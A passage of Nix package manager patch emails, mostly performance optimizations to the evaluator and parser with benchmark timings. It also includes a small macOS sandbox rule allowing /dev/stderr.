/dev/stdout, so why not this? Since it is process-local, anyway, should not be possible to escape sandbox using it. 
--- src/libstore/build/sandbox-defaults.sb | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libstore/build/sandbox-defaults.sb b/src/libstore/build/sandbox-defaults.sb index 77f013aea..25ec11285 100644 --- a/src/libstore/build/sandbox-defaults.sb +++ b/src/libstore/build/sandbox-defaults.sb @@ -68,6 +68,7 @@ R""( (allow file* (literal "/dev/null") (literal "/dev/random") + (literal "/dev/stderr") (literal "/dev/stdin") (literal "/dev/stdout") (literal "/dev/tty") From 0218e4e6c386e4c432520506568420c3cc384e47 Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 04:15:51 +0100 Subject: [PATCH 147/654] memset less in addToStoreFromDump MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit resizing a std::string clears the newly added bytes, which is not necessary here and comes with a ~1.4% slowdown on our test nixos config. 〉 nix eval --raw --impure --expr 'with import {}; system' before: Time (mean ± σ): 4.486 s ± 0.003 s [User: 3.978 s, System: 0.507 s] Range (min … max): 4.482 s … 4.492 s 10 runs after: Time (mean ± σ): 4.429 s ± 0.002 s [User: 3.929 s, System: 0.500 s] Range (min … max): 4.427 s … 4.433 s 10 runs --- src/libstore/local-store.cc | 22 +++++++++++++++++----- 1 file changed, 17 insertions(+), 5 deletions(-) diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index 7e82bae28..d903bb061 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -18,6 +18,8 @@ #include #include +#include +#include #include #include #include @@ -1130,7 +1132,11 @@ StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name path. 
*/ bool inMemory = false; - std::string dump; + struct Free { + void operator()(void* v) { free(v); } + }; + std::unique_ptr dumpBuffer(nullptr); + std::string_view dump; /* Fill out buffer, and decide whether we are working strictly in memory based on whether we break out because the buffer is full @@ -1139,13 +1145,18 @@ StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name auto oldSize = dump.size(); constexpr size_t chunkSize = 65536; auto want = std::min(chunkSize, settings.narBufferSize - oldSize); - dump.resize(oldSize + want); + if (auto tmp = realloc(dumpBuffer.get(), oldSize + want)) { + dumpBuffer.release(); + dumpBuffer.reset((char*) tmp); + } else { + throw std::bad_alloc(); + } auto got = 0; Finally cleanup([&]() { - dump.resize(oldSize + got); + dump = {dumpBuffer.get(), dump.size() + got}; }); try { - got = source.read(dump.data() + oldSize, want); + got = source.read(dumpBuffer.get() + oldSize, want); } catch (EndOfFile &) { inMemory = true; break; @@ -1171,7 +1182,8 @@ StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name else writeFile(tempPath, bothSource); - dump.clear(); + dumpBuffer.reset(); + dump = {}; } auto [hash, size] = hashSink->finish(); From 78353deb028fcc700776db9d92dcae45d68fb85f Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 08:24:45 +0100 Subject: [PATCH 148/654] encode black holes as tApp values MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit checking for isBlackhole in the forceValue hot path is rather more expensive than necessary, and with a little bit of trickery we can move such handling into the isApp case. small performance benefit, but under some circumstances we've seen 2% improvement as well. 
〉 nix eval --raw --impure --expr 'with import {}; system' before: Time (mean ± σ): 4.429 s ± 0.002 s [User: 3.929 s, System: 0.500 s] Range (min … max): 4.427 s … 4.433 s 10 runs after: Time (mean ± σ): 4.396 s ± 0.002 s [User: 3.894 s, System: 0.501 s] Range (min … max): 4.393 s … 4.399 s 10 runs --- src/libexpr/eval-inline.hh | 13 +++++++---- src/libexpr/eval.cc | 44 +++++++++++++++++++++----------------- src/libexpr/eval.hh | 8 +++++++ src/libexpr/nixexpr.hh | 7 ++++++ src/libexpr/primops.cc | 23 ++++++++++++++++++++ src/libexpr/primops.hh | 6 ++++++ src/libexpr/value.hh | 24 ++++++++++++++------- 7 files changed, 93 insertions(+), 32 deletions(-) diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index c37b1d62b..9d08f1938 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -104,11 +104,16 @@ void EvalState::forceValue(Value & v, Callable getPos) } } else if (v.isApp()) { - PosIdx pos = getPos(); - callFunction(*v.app.left, *v.app.right, v, pos); + try { + callFunction(*v.app.left, *v.app.right, v, noPos); + } catch (InfiniteRecursionError & e) { + // only one black hole can *throw* in any given eval stack so we need not + // check whether the position is set already. 
+ if (v.isBlackhole()) + e.err.errPos = positions[getPos()]; + throw; + } } - else if (v.isBlackhole()) - error("infinite recursion encountered").atPos(getPos()).template debugThrow(); } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 9e494148e..71c151f96 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -162,7 +162,17 @@ void Value::print(const SymbolTable &symbols, std::ostream &str, break; case tThunk: case tApp: - str << ""; + if (!isBlackhole()) { + str << ""; + } else { + // Although we know for sure that it's going to be an infinite recursion + // when this value is accessed _in the current context_, it's likely + // that the user will misinterpret a simpler «infinite recursion» output + // as a definitive statement about the value, while in fact it may be + // a valid value after `builtins.trace` and perhaps some other steps + // have completed. + str << "«potential infinite recursion»"; + } break; case tLambda: str << ""; @@ -179,15 +189,6 @@ void Value::print(const SymbolTable &symbols, std::ostream &str, case tFloat: str << fpoint; break; - case tBlackhole: - // Although we know for sure that it's going to be an infinite recursion - // when this value is accessed _in the current context_, it's likely - // that the user will misinterpret a simpler «infinite recursion» output - // as a definitive statement about the value, while in fact it may be - // a valid value after `builtins.trace` and perhaps some other steps - // have completed. 
- str << "«potential infinite recursion»"; - break; default: printError("Nix evaluator internal error: Value::print(): invalid value type %1%", internalType); abort(); @@ -256,8 +257,7 @@ std::string showType(const Value & v) return fmt("the partially applied built-in function '%s'", std::string(getPrimOp(v)->primOp->name)); case tExternal: return v.external->showType(); case tThunk: return "a thunk"; - case tApp: return "a function application"; - case tBlackhole: return "a black hole"; + case tApp: return v.isBlackhole() ? "a black hole" : "a function application"; default: return std::string(showType(v.type())); } @@ -1621,15 +1621,17 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & return; } else { /* We have all the arguments, so call the primop. */ - auto name = vCur.primOp->name; + auto * fn = vCur.primOp; nrPrimOpCalls++; - if (countCalls) primOpCalls[name]++; + // This will count black holes, but that's ok, because unrecoverable errors are rare. + if (countCalls) primOpCalls[fn->name]++; try { - vCur.primOp->fun(*this, vCur.determinePos(noPos), args, vCur); + fn->fun(*this, vCur.determinePos(noPos), args, vCur); } catch (Error & e) { - addErrorTrace(e, pos, "while calling the '%1%' builtin", name); + if (!fn->hideInDiagnostics) + addErrorTrace(e, pos, "while calling the '%1%' builtin", fn->name); throw; } @@ -1666,18 +1668,20 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & for (size_t i = 0; i < argsLeft; ++i) vArgs[argsDone + i] = args[i]; - auto name = primOp->primOp->name; + auto fn = primOp->primOp; nrPrimOpCalls++; - if (countCalls) primOpCalls[name]++; + // This will count black holes, but that's ok, because unrecoverable errors are rare. + if (countCalls) primOpCalls[fn->name]++; try { // TODO: // 1. Unify this and above code. Heavily redundant. // 2. Create a fake env (arg1, arg2, etc.) 
and a fake expr (arg1: arg2: etc: builtins.name arg1 arg2 etc) // so the debugger allows to inspect the wrong parameters passed to the builtin. - primOp->primOp->fun(*this, vCur.determinePos(noPos), vArgs, vCur); + fn->fun(*this, vCur.determinePos(noPos), vArgs, vCur); } catch (Error & e) { - addErrorTrace(e, pos, "while calling the '%1%' builtin", name); + if (!fn->hideInDiagnostics) + addErrorTrace(e, pos, "while calling the '%1%' builtin", fn->name); throw; } diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index f3f6d35b9..e5e401ab6 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -77,6 +77,14 @@ struct PrimOp */ std::optional experimentalFeature; + /** + * Whether to hide this primop in diagnostics. + * + * Used to hide the fact that black holes are primop applications from + * stack traces. + */ + bool hideInDiagnostics; + /** * Validity check to be performed by functions that introduce primops, * such as RegisterPrimOp() and Value::mkPrimOp(). diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 020286815..cf6fd1a8d 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -21,6 +21,13 @@ MakeError(TypeError, EvalError); MakeError(UndefinedVarError, Error); MakeError(MissingArgumentError, EvalError); +class InfiniteRecursionError : public EvalError +{ + friend class EvalState; +public: + using EvalError::EvalError; +}; + /** * Position objects. 
*/ diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 89d5492da..d46eccd34 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -4263,6 +4263,29 @@ static RegisterPrimOp primop_splitVersion({ }); +static void prim_blackHoleFn(EvalState & state, const PosIdx pos, Value * * args, Value & v) +{ + state.error("infinite recursion encountered") + .debugThrow(); +} + +static PrimOp primop_blackHole = { + .name = "«blackHole»", + .args = {}, + .fun = prim_blackHoleFn, + .hideInDiagnostics = true, +}; + +static Value makeBlackHole() +{ + Value v; + v.mkPrimOp(&primop_blackHole); + return v; +} + +Value prim_blackHole = makeBlackHole(); + + /************************************************************* * Primop registration *************************************************************/ diff --git a/src/libexpr/primops.hh b/src/libexpr/primops.hh index 45486608f..244eada86 100644 --- a/src/libexpr/primops.hh +++ b/src/libexpr/primops.hh @@ -51,4 +51,10 @@ void prim_importNative(EvalState & state, const PosIdx pos, Value * * args, Valu */ void prim_exec(EvalState & state, const PosIdx pos, Value * * args, Value & v); +/** + * Placeholder value for black holes, used to represent black holes as + * applications of this value to the evaluated thunks. 
+ */ +extern Value prim_blackHole; + } diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh index 30b3d4934..52cd0f901 100644 --- a/src/libexpr/value.hh +++ b/src/libexpr/value.hh @@ -32,7 +32,6 @@ typedef enum { tThunk, tApp, tLambda, - tBlackhole, tPrimOp, tPrimOpApp, tExternal, @@ -151,7 +150,7 @@ public: // type() == nThunk inline bool isThunk() const { return internalType == tThunk; }; inline bool isApp() const { return internalType == tApp; }; - inline bool isBlackhole() const { return internalType == tBlackhole; }; + inline bool isBlackhole() const; // type() == nFunction inline bool isLambda() const { return internalType == tLambda; }; @@ -248,7 +247,7 @@ public: case tLambda: case tPrimOp: case tPrimOpApp: return nFunction; case tExternal: return nExternal; case tFloat: return nFloat; - case tThunk: case tApp: case tBlackhole: return nThunk; + case tThunk: case tApp: return nThunk; } if (invalidIsThunk) return nThunk; @@ -356,11 +355,7 @@ public: lambda.fun = f; } - inline void mkBlackhole() - { - internalType = tBlackhole; - // Value will be overridden anyways - } + inline void mkBlackhole(); void mkPrimOp(PrimOp * p); @@ -447,6 +442,19 @@ public: }; +extern Value prim_blackHole; + +inline bool Value::isBlackhole() const +{ + return internalType == tApp && app.left == &prim_blackHole; +} + +inline void Value::mkBlackhole() +{ + mkApp(&prim_blackHole, &prim_blackHole); +} + + #if HAVE_BOEHMGC typedef std::vector> ValueVector; typedef std::map, traceable_allocator>> ValueMap; From 74c134914c747b1df6385cab5d2298f66a87b61f Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 09:25:20 +0100 Subject: [PATCH 149/654] compare string values with strcmp string_view()ification calls strlen() first, which we don't need here. 
--- src/libexpr/eval.cc | 2 +- src/libexpr/primops.cc | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 71c151f96..8e89ddcf1 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2436,7 +2436,7 @@ bool EvalState::eqValues(Value & v1, Value & v2, const PosIdx pos, std::string_v return v1.boolean == v2.boolean; case nString: - return v1.string_view().compare(v2.string_view()) == 0; + return strcmp(v1.c_str(), v2.c_str()) == 0; case nPath: return diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index d46eccd34..b7e903667 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -586,7 +586,7 @@ struct CompareValues case nFloat: return v1->fpoint < v2->fpoint; case nString: - return v1->string_view().compare(v2->string_view()) < 0; + return strcmp(v1->c_str(), v2->c_str()) < 0; case nPath: // Note: we don't take the accessor into account // since it's not obvious how to compare them in a @@ -2401,7 +2401,7 @@ static void prim_attrNames(EvalState & state, const PosIdx pos, Value * * args, (v.listElems()[n++] = state.allocValue())->mkString(state.symbols[i.name]); std::sort(v.listElems(), v.listElems() + n, - [](Value * v1, Value * v2) { return v1->string_view().compare(v2->string_view()) < 0; }); + [](Value * v1, Value * v2) { return strcmp(v1->c_str(), v2->c_str()) < 0; }); } static RegisterPrimOp primop_attrNames({ From cc4038d54177c944340607c7d141680e66ff92a7 Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 09:49:38 +0100 Subject: [PATCH 150/654] use std::tie() for macro-generated operators MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit as written the comparisons generate copies, even though it looks as though they shouldn't. 
before: Time (mean ± σ): 4.396 s ± 0.002 s [User: 3.894 s, System: 0.501 s] Range (min … max): 4.393 s … 4.399 s 10 runs after: Time (mean ± σ): 4.260 s ± 0.003 s [User: 3.754 s, System: 0.505 s] Range (min … max): 4.257 s … 4.266 s 10 runs --- src/libcmd/built-path.cc | 4 ++-- src/libstore/derived-path.cc | 8 ++------ src/libutil/comparator.hh | 4 ++-- 3 files changed, 6 insertions(+), 10 deletions(-) diff --git a/src/libcmd/built-path.cc b/src/libcmd/built-path.cc index 8e2efc7c3..c5eb93c5d 100644 --- a/src/libcmd/built-path.cc +++ b/src/libcmd/built-path.cc @@ -12,9 +12,9 @@ namespace nix { bool MY_TYPE ::operator COMPARATOR (const MY_TYPE & other) const \ { \ const MY_TYPE* me = this; \ - auto fields1 = std::make_tuple(*me->drvPath, me->FIELD); \ + auto fields1 = std::tie(*me->drvPath, me->FIELD); \ me = &other; \ - auto fields2 = std::make_tuple(*me->drvPath, me->FIELD); \ + auto fields2 = std::tie(*me->drvPath, me->FIELD); \ return fields1 COMPARATOR fields2; \ } #define CMP(CHILD_TYPE, MY_TYPE, FIELD) \ diff --git a/src/libstore/derived-path.cc b/src/libstore/derived-path.cc index 3105dbc93..a7b404321 100644 --- a/src/libstore/derived-path.cc +++ b/src/libstore/derived-path.cc @@ -12,9 +12,9 @@ namespace nix { bool MY_TYPE ::operator COMPARATOR (const MY_TYPE & other) const \ { \ const MY_TYPE* me = this; \ - auto fields1 = std::make_tuple(*me->drvPath, me->FIELD); \ + auto fields1 = std::tie(*me->drvPath, me->FIELD); \ me = &other; \ - auto fields2 = std::make_tuple(*me->drvPath, me->FIELD); \ + auto fields2 = std::tie(*me->drvPath, me->FIELD); \ return fields1 COMPARATOR fields2; \ } #define CMP(CHILD_TYPE, MY_TYPE, FIELD) \ @@ -22,13 +22,9 @@ namespace nix { CMP_ONE(CHILD_TYPE, MY_TYPE, FIELD, !=) \ CMP_ONE(CHILD_TYPE, MY_TYPE, FIELD, <) -#define FIELD_TYPE std::string CMP(SingleDerivedPath, SingleDerivedPathBuilt, output) -#undef FIELD_TYPE -#define FIELD_TYPE OutputsSpec CMP(SingleDerivedPath, DerivedPathBuilt, outputs) -#undef FIELD_TYPE #undef CMP 
#undef CMP_ONE diff --git a/src/libutil/comparator.hh b/src/libutil/comparator.hh index a4d20a675..cbc2bb4fd 100644 --- a/src/libutil/comparator.hh +++ b/src/libutil/comparator.hh @@ -13,9 +13,9 @@ #define GENERATE_ONE_CMP(PRE, QUAL, COMPARATOR, MY_TYPE, ...) \ PRE bool QUAL operator COMPARATOR(const MY_TYPE & other) const { \ __VA_OPT__(const MY_TYPE * me = this;) \ - auto fields1 = std::make_tuple( __VA_ARGS__ ); \ + auto fields1 = std::tie( __VA_ARGS__ ); \ __VA_OPT__(me = &other;) \ - auto fields2 = std::make_tuple( __VA_ARGS__ ); \ + auto fields2 = std::tie( __VA_ARGS__ ); \ return fields1 COMPARATOR fields2; \ } #define GENERATE_EQUAL(prefix, qualification, my_type, args...) \ From 2e0321912a9efa352160eb1e57e6b7b88e517d0d Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 12:59:51 +0100 Subject: [PATCH 151/654] use aligned flex tables MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ~2% speedup on parsing without eval, less (but still significant) on system eval. having flex generate faster parsers leads to very strange misparses. maybe re2c is worth investigating. 
before: Time (mean ± σ): 4.260 s ± 0.003 s [User: 3.754 s, System: 0.505 s] Range (min … max): 4.257 s … 4.266 s 10 runs after: Time (mean ± σ): 4.231 s ± 0.004 s [User: 3.725 s, System: 0.504 s] Range (min … max): 4.226 s … 4.240 s 10 runs --- src/libexpr/lexer.l | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index a3a8608d9..9a35dd594 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -1,4 +1,5 @@ %option reentrant bison-bridge bison-locations +%option align %option noyywrap %option never-interactive %option stack From b78e77b34c14b0f127b22e252309527e84967dcc Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 13:00:18 +0100 Subject: [PATCH 152/654] use custom location type in the parser MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ~1% parser speedup from not using TLS indirections, less on system eval. this could have also gone in flex yyextra data, but that's significantly slower for some reason (albeit still faster than thread locals). 
before: Time (mean ± σ): 4.231 s ± 0.004 s [User: 3.725 s, System: 0.504 s] Range (min … max): 4.226 s … 4.240 s 10 runs after: Time (mean ± σ): 4.224 s ± 0.005 s [User: 3.711 s, System: 0.512 s] Range (min … max): 4.218 s … 4.234 s 10 runs --- src/libexpr/lexer.l | 9 +++------ src/libexpr/parser.y | 25 +++++++++++++++++++++++++ 2 files changed, 28 insertions(+), 6 deletions(-) diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index 9a35dd594..df2cbd06f 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -36,9 +36,6 @@ static inline PosIdx makeCurPos(const YYLTYPE & loc, ParseData * data) #define CUR_POS makeCurPos(*yylloc, data) -// backup to recover from yyless(0) -thread_local YYLTYPE prev_yylloc; - static void initLoc(YYLTYPE * loc) { loc->first_line = loc->last_line = 1; @@ -47,7 +44,7 @@ static void initLoc(YYLTYPE * loc) static void adjustLoc(YYLTYPE * loc, const char * s, size_t len) { - prev_yylloc = *loc; + loc->stash(); loc->first_line = loc->last_line; loc->first_column = loc->last_column; @@ -231,7 +228,7 @@ or { return OR_KW; } {HPATH_START}\$\{ { PUSH_STATE(PATH_START); yyless(0); - *yylloc = prev_yylloc; + yylloc->unstash(); } {PATH_SEG} { @@ -287,7 +284,7 @@ or { return OR_KW; } context (it may be ')', ';', or something of that sort) */ POP_STATE(); yyless(0); - *yylloc = prev_yylloc; + yylloc->unstash(); return PATH_END; } diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 16ad8af2e..b331776f0 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -28,6 +28,31 @@ namespace nix { +#define YYLTYPE ::nix::ParserLocation + struct ParserLocation + { + int first_line, first_column; + int last_line, last_column; + + // backup to recover from yyless(0) + int stashed_first_line, stashed_first_column; + int stashed_last_line, stashed_last_column; + + void stash() { + stashed_first_line = first_line; + stashed_first_column = first_column; + stashed_last_line = last_line; + stashed_last_column = last_column; + } + + void 
unstash() { + first_line = stashed_first_line; + first_column = stashed_first_column; + last_line = stashed_last_line; + last_column = stashed_last_column; + } + }; + struct ParseData { EvalState & state; From f9aee2f2c41652b3b76d16a874fdded4e6d28d92 Mon Sep 17 00:00:00 2001 From: pennae Date: Sun, 10 Dec 2023 10:34:55 +0100 Subject: [PATCH 153/654] don't malloc/memset posix accessor buffer it's relatively small and fits on the stack nicely, and we don't need it initialized either. --- src/libutil/posix-source-accessor.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc index 15ff76e59..5f26fa67b 100644 --- a/src/libutil/posix-source-accessor.cc +++ b/src/libutil/posix-source-accessor.cc @@ -25,7 +25,7 @@ void PosixSourceAccessor::readFile( off_t left = st.st_size; - std::vector buf(64 * 1024); + std::array buf; while (left) { checkInterrupt(); ssize_t rd = read(fd.get(), buf.data(), (size_t) std::min(left, (off_t) buf.size())); From 69ed4aee612e247f2d6ebbb44aba743c4282e00e Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 11 Dec 2023 15:48:24 +0100 Subject: [PATCH 154/654] remove lazy-pos forceValue almost all uses of this are interactive, except for deepSeq. deepSeq is going to be expensive and rare enough to not care much about, and Value::determinePos should usually be cheap enough to not be too much of a burden in any case. 
--- src/libcmd/installable-flake.cc | 2 +- src/libcmd/repl.cc | 4 ++-- src/libexpr/eval-inline.hh | 10 +--------- src/libexpr/eval.cc | 2 +- src/libexpr/eval.hh | 3 --- src/libexpr/get-drvs.cc | 4 ++-- src/nix-build/nix-build.cc | 2 +- src/nix-env/user-env.cc | 2 +- src/nix-instantiate/nix-instantiate.cc | 2 +- 9 files changed, 10 insertions(+), 21 deletions(-) diff --git a/src/libcmd/installable-flake.cc b/src/libcmd/installable-flake.cc index 2f428cb7e..ddec7537b 100644 --- a/src/libcmd/installable-flake.cc +++ b/src/libcmd/installable-flake.cc @@ -52,7 +52,7 @@ Value * InstallableFlake::getFlakeOutputs(EvalState & state, const flake::Locked auto aOutputs = vFlake->attrs->get(state.symbols.create("outputs")); assert(aOutputs); - state.forceValue(*aOutputs->value, [&]() { return aOutputs->value->determinePos(noPos); }); + state.forceValue(*aOutputs->value, aOutputs->value->determinePos(noPos)); return aOutputs->value; } diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 0986296ad..97d709ff4 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -888,7 +888,7 @@ void NixRepl::evalString(std::string s, Value & v) { Expr * e = parseString(s); e->eval(*state, *env, v); - state->forceValue(v, [&]() { return v.determinePos(noPos); }); + state->forceValue(v, v.determinePos(noPos)); } @@ -907,7 +907,7 @@ std::ostream & NixRepl::printValue(std::ostream & str, Value & v, unsigned int m str.flush(); checkInterrupt(); - state->forceValue(v, [&]() { return v.determinePos(noPos); }); + state->forceValue(v, v.determinePos(noPos)); switch (v.type()) { diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index 9d08f1938..8a9ebb77a 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -81,15 +81,7 @@ Env & EvalState::allocEnv(size_t size) } -[[gnu::always_inline]] void EvalState::forceValue(Value & v, const PosIdx pos) -{ - forceValue(v, [&]() { return pos; }); -} - - -template -void EvalState::forceValue(Value & v, Callable 
getPos) { if (v.isThunk()) { Env * env = v.thunk.env; @@ -110,7 +102,7 @@ void EvalState::forceValue(Value & v, Callable getPos) // only one black hole can *throw* in any given eval stack so we need not // check whether the position is set already. if (v.isBlackhole()) - e.err.errPos = positions[getPos()]; + e.err.errPos = positions[pos]; throw; } } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 8e89ddcf1..4dc5af97a 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2044,7 +2044,7 @@ void EvalState::forceValueDeep(Value & v) recurse = [&](Value & v) { if (!seen.insert(&v).second) return; - forceValue(v, [&]() { return v.determinePos(noPos); }); + forceValue(v, v.determinePos(noPos)); if (v.type() == nAttrs) { for (auto & i : *v.attrs) diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index e5e401ab6..4c7ea1d98 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -473,9 +473,6 @@ public: */ inline void forceValue(Value & v, const PosIdx pos); - template - inline void forceValue(Value & v, Callable getPos); - /** * Force a value, then recursively force list elements and * attributes. 
diff --git a/src/libexpr/get-drvs.cc b/src/libexpr/get-drvs.cc index d4e946d81..a6441871c 100644 --- a/src/libexpr/get-drvs.cc +++ b/src/libexpr/get-drvs.cc @@ -198,7 +198,7 @@ StringSet DrvInfo::queryMetaNames() bool DrvInfo::checkMeta(Value & v) { - state->forceValue(v, [&]() { return v.determinePos(noPos); }); + state->forceValue(v, v.determinePos(noPos)); if (v.type() == nList) { for (auto elem : v.listItems()) if (!checkMeta(*elem)) return false; @@ -304,7 +304,7 @@ static bool getDerivation(EvalState & state, Value & v, bool ignoreAssertionFailures) { try { - state.forceValue(v, [&]() { return v.determinePos(noPos); }); + state.forceValue(v, v.determinePos(noPos)); if (!state.isDerivation(v)) return true; /* Remove spurious duplicates (e.g., a set like `rec { x = diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc index 01da028d8..4465e2f90 100644 --- a/src/nix-build/nix-build.cc +++ b/src/nix-build/nix-build.cc @@ -350,7 +350,7 @@ static void main_nix_build(int argc, char * * argv) takesNixShellAttr(vRoot) ? *autoArgsWithInNixShell : *autoArgs, vRoot ).first); - state->forceValue(v, [&]() { return v.determinePos(noPos); }); + state->forceValue(v, v.determinePos(noPos)); getDerivations( *state, v, diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc index 34f6bd005..fe5b89b3f 100644 --- a/src/nix-env/user-env.cc +++ b/src/nix-env/user-env.cc @@ -128,7 +128,7 @@ bool createUserEnv(EvalState & state, DrvInfos & elems, /* Evaluate it. 
*/ debug("evaluating user environment builder"); - state.forceValue(topLevel, [&]() { return topLevel.determinePos(noPos); }); + state.forceValue(topLevel, topLevel.determinePos(noPos)); NixStringContext context; Attr & aDrvPath(*topLevel.attrs->find(state.sDrvPath)); auto topLevelDrv = state.coerceToStorePath(aDrvPath.pos, *aDrvPath.value, context, ""); diff --git a/src/nix-instantiate/nix-instantiate.cc b/src/nix-instantiate/nix-instantiate.cc index 86b9be17d..ab590b3a6 100644 --- a/src/nix-instantiate/nix-instantiate.cc +++ b/src/nix-instantiate/nix-instantiate.cc @@ -40,7 +40,7 @@ void processExpr(EvalState & state, const Strings & attrPaths, for (auto & i : attrPaths) { Value & v(*findAlongAttrPath(state, i, autoArgs, vRoot).first); - state.forceValue(v, [&]() { return v.determinePos(noPos); }); + state.forceValue(v, v.determinePos(noPos)); NixStringContext context; if (evalOnly) { From f9db4de0f3758e0f730a5d98348e7cc40082104a Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 11 Dec 2023 15:54:16 +0100 Subject: [PATCH 155/654] force-inline forceValue MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit forceValue is extremely hot. interestingly adding likeliness annotations to the branches does not seem to make a difference. 
before: Time (mean ± σ): 4.224 s ± 0.005 s [User: 3.711 s, System: 0.512 s] Range (min … max): 4.218 s … 4.234 s 10 runs after: Time (mean ± σ): 4.140 s ± 0.009 s [User: 3.647 s, System: 0.492 s] Range (min … max): 4.130 s … 4.152 s 10 runs --- src/libexpr/eval-inline.hh | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index 8a9ebb77a..d48871628 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -81,6 +81,7 @@ Env & EvalState::allocEnv(size_t size) } +[[gnu::always_inline]] void EvalState::forceValue(Value & v, const PosIdx pos) { if (v.isThunk()) { From 2b0e95e7aabd075f95cbfb1607330b2284b01918 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 11 Dec 2023 16:23:08 +0100 Subject: [PATCH 156/654] use singleton expr to generate black hole errors this also reduces forceValue code size and removes the need for hideInDiagnostics. coopting thunk forcing like this has the additional benefit of clarifying how these errors can happen in the first place. --- src/libexpr/eval-inline.hh | 14 +++----------- src/libexpr/eval.cc | 35 +++++++++++++++++++++++++++-------- src/libexpr/eval.hh | 10 ++-------- src/libexpr/nixexpr.cc | 2 ++ src/libexpr/nixexpr.hh | 10 ++++++++++ src/libexpr/primops.cc | 23 ----------------------- src/libexpr/primops.hh | 6 ------ src/libexpr/value.hh | 12 +++++++----- 8 files changed, 51 insertions(+), 61 deletions(-) diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index d48871628..52aa75b5f 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -93,20 +93,12 @@ void EvalState::forceValue(Value & v, const PosIdx pos) expr->eval(*this, *env, v); } catch (...) 
{ v.mkThunk(env, expr); + tryFixupBlackHolePos(v, pos); throw; } } - else if (v.isApp()) { - try { - callFunction(*v.app.left, *v.app.right, v, noPos); - } catch (InfiniteRecursionError & e) { - // only one black hole can *throw* in any given eval stack so we need not - // check whether the position is set already. - if (v.isBlackhole()) - e.err.errPos = positions[pos]; - throw; - } - } + else if (v.isApp()) + callFunction(*v.app.left, *v.app.right, v, pos); } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 4dc5af97a..0c35b3713 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -256,8 +256,8 @@ std::string showType(const Value & v) case tPrimOpApp: return fmt("the partially applied built-in function '%s'", std::string(getPrimOp(v)->primOp->name)); case tExternal: return v.external->showType(); - case tThunk: return "a thunk"; - case tApp: return v.isBlackhole() ? "a black hole" : "a function application"; + case tThunk: return 